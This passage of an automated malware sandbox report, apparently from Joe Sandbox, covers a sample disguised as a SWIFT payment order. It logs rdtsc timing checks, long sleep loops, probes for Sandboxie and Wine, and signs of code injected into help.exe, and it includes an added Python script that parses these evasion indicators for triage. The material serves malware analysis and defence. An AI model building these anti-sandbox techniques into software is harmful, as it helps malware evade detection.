          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 00000000006B8614 second address: 00000000006B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exe | RDTSC instruction interceptor: First address: 00000000006B89AE second address: 00000000006B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 | Thread sleep count: 3989 > 30
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 | Thread sleep count: 4346 > 30
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 5664 | Thread sleep time: -39327s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239497s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239370s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239263s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239152s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -239031s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238921s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238812s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238703s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238593s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238483s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238375s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238265s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238150s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -238045s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237937s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237499s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237390s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237281s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237171s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -237062s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236952s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236843s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236734s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236625s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236515s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236406s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236296s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236152s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -236046s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235937s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235828s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235718s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235609s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235500s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235390s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235281s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235141s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -235031s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234913s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234797s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234682s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234553s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234391s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234250s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234140s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -234012s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233898s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233750s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233640s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233529s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233421s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233312s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233203s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -233093s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232980s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232865s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232687s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232535s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232395s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -232268s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -230891s >= -30000s
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 | Thread sleep time: -230122s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356 | Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 | Thread sleep count: 7185 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 | Thread sleep count: 1300 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 | Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Code function: 8_2_004088E0 rdtsc
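          The evasion entries above are easier to act on once they are aggregated per thread and per process. The script below is an added triage example, not part of the Joe Sandbox report; it runs over a constructed input of lines copied from this section (sample file name shortened to sample.exe, fused fields such as "exeThread" and "sdmpBinary" kept as the extraction produced them). It reports the per-thread sleep totals and the shrinking staircase of TID 1256 (240000, 239828, 239718, ...), which is the footprint of a loop that is woken early by the sandbox, re-reads the clock and sleeps again for the remainder of one fixed deadline; it flags 922337203685477 as TimeSpan.MaxValue in milliseconds, i.e. a .NET wait that never expires on its own; it checks that each intercepted rdtsc pair is a genuine timing check (only register arithmetic between the two reads, as in the xor ecx, ecx / add ecx, eax sequence the report shows); and it notices that the help.exe rdtsc sites are the sample's sites shifted by one constant (0x2B0000), which is what the hollowed help.exe running the same code looks like from this section alone. The report labels sleep values with "s" although their magnitude reads as milliseconds; the script keeps the raw numbers. The chain thresholds (step 20 to 2000, minimum run 3), the allowed-ALU set and the 10**12 cut-off for "infinite" waits are my own choices.

```python
import re
from collections import defaultdict

# Constructed input: lines copied from the evasion section above, sample file name
# shortened to sample.exe. Fused fields are left as the page extraction produced them.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\sample.exe TID: 1256Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\sample.exe TID: 1064Thread sleep count: 3989 > 30
Source: C:\Users\user\Desktop\sample.exe TID: 1256Thread sleep time: -239828s >= -30000s
Source: C:\Users\user\Desktop\sample.exe TID: 5664Thread sleep time: -39327s >= -30000s
Source: C:\Users\user\Desktop\sample.exe TID: 1256Thread sleep time: -239718s >= -30000s
Source: C:\Users\user\Desktop\sample.exe TID: 1256Thread sleep time: -239609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\sample.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sample.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000006B8614 second address: 00000000006B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000006B89AE second address: 00000000006B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: sample.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: sample.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
""".strip().splitlines()

SLEEP_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+)Thread sleep time: -(?P<n>\d+)s")
COUNT_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+)Thread sleep count: (?P<n>\d+)")
RDTSC_RE = re.compile(r"^Source: (?P<proc>.+?)RDTSC instruction interceptor: First address: "
                      r"(?P<a1>[0-9A-Fa-f]+) second address: (?P<a2>[0-9A-Fa-f]+) instructions: (?P<ins>.+)$")
STRING_RE = re.compile(r"Binary or memory string: (?P<s>\S+)$")

# Artefacts the sample probes for, as named in the report: Sandboxie's DLL and Wine's kernel32 export.
KNOWN_ARTEFACTS = {"SBIEDLL.DLL": "Sandboxie", "KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME": "Wine"}
# 922337203685477 is TimeSpan.MaxValue.TotalMilliseconds; anything this large never expires by itself.
INFINITE_FLOOR = 10**12
# Only register arithmetic may sit between the two rdtsc reads of a timing check (my choice of set).
ALU_ONLY = {"xor", "add", "sub", "mov", "shl", "shr", "sbb", "adc", "cmp", "or", "and"}

def parse_report(lines):
    sleeps, counts, rdtsc, artefacts = defaultdict(list), {}, [], []
    for line in lines:
        if m := SLEEP_RE.match(line):
            sleeps[(m["proc"], int(m["tid"]))].append(int(m["n"]))
        elif m := COUNT_RE.match(line):
            counts[(m["proc"], int(m["tid"]))] = int(m["n"])
        elif m := RDTSC_RE.match(line):
            rdtsc.append((m["proc"], int(m["a1"], 16), int(m["a2"], 16), m["ins"]))
        elif m := STRING_RE.search(line):
            artefacts.append(m["s"].upper())
    return {"sleeps": dict(sleeps), "counts": counts, "rdtsc": rdtsc, "artefacts": artefacts}

def remaining_time_chain(delays, min_step=20, max_step=2000):
    """Longest run of consecutive delays that each shrink by a small step: a thread woken
    early by the sandbox that re-sleeps for what is left of one deadline produces this."""
    best = run = 1 if delays else 0
    for prev, cur in zip(delays, delays[1:]):
        run = run + 1 if min_step <= prev - cur <= max_step else 1
        best = max(best, run)
    return best

def rdtsc_pair_is_timing_check(instructions):
    """True when two rdtsc reads are separated only by register arithmetic."""
    ops = [op for op in re.split(r"\s*0x[0-9A-Fa-f]{8}\s+", instructions) if op]
    mnemonics = [op.split()[0] for op in ops]
    return (len(mnemonics) >= 2 and mnemonics[0] == mnemonics[-1] == "rdtsc"
            and all(mn in ALU_ONLY for mn in mnemonics[1:-1]))

def shared_code_delta(report):
    """Process pairs whose rdtsc sites differ by one constant run the same code at two bases."""
    by_proc = defaultdict(list)
    for proc, a1, _a2, _ins in report["rdtsc"]:
        by_proc[proc].append(a1)
    procs, result = sorted(by_proc), {}
    for i, p in enumerate(procs):
        for q in procs[i + 1:]:
            a, b = sorted(by_proc[p]), sorted(by_proc[q])
            deltas = {y - x for x, y in zip(a, b)}
            if len(a) == len(b) and len(deltas) == 1:
                result[(p, q)] = deltas.pop()
    return result

def summarize(report):
    out = {"total_sleep": {}, "sleep_chains": {}, "infinite_waits": [], "busy_loops": {},
           "rdtsc_sites": [], "sandboxes_probed": []}
    for key, delays in report["sleeps"].items():
        finite = [d for d in delays if d < INFINITE_FLOOR]
        if len(finite) < len(delays):
            out["infinite_waits"].append(key)
        out["total_sleep"][key] = sum(finite)
        if (chain := remaining_time_chain(finite)) >= 3:
            out["sleep_chains"][key] = chain
    out["busy_loops"] = {k: n for k, n in report["counts"].items() if n > 30}
    for proc, a1, a2, ins in report["rdtsc"]:
        out["rdtsc_sites"].append((proc, a1, a2 - a1, rdtsc_pair_is_timing_check(ins)))
    out["sandboxes_probed"] = sorted({KNOWN_ARTEFACTS[s] for s in report["artefacts"] if s in KNOWN_ARTEFACTS})
    return out

if __name__ == "__main__":
    report = parse_report(SAMPLE_LINES)
    print(summarize(report), shared_code_delta(report), sep="\n")
```

          Run against the full report text instead of SAMPLE_LINES, the same parser gives the complete TID 1256 staircase and the powershell.exe waits; the 7378697629483816 values are caught by the same cut-off. The relocation delta is the quickest confirmation that the rdtsc checks in help.exe belong to the injected payload rather than to help.exe itself.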
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239497
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239370
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239263
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238921
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238812
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238703
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238593
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238483
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238375
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238265
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238150
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238045
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237499
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237171
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 237062
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236952
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236843
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236734
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236625
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236515
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236296
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 236046
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235500
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235141
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 235031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234913
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234797
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234682
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234553
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234391
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234140
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 234012
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233898
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233750
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233640
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233529
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233421
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233312
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233203
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 233093
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232980
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232865
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232687
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232535
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232395
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 232268
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 230891
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 230122
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Window / User API: threadDelayed 3989
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Window / User API: threadDelayed 4346
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6427
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1224
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7185
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1300
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 39327
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239497
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239370
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239263
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 239031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe | Thread delayed: delay time: 238921
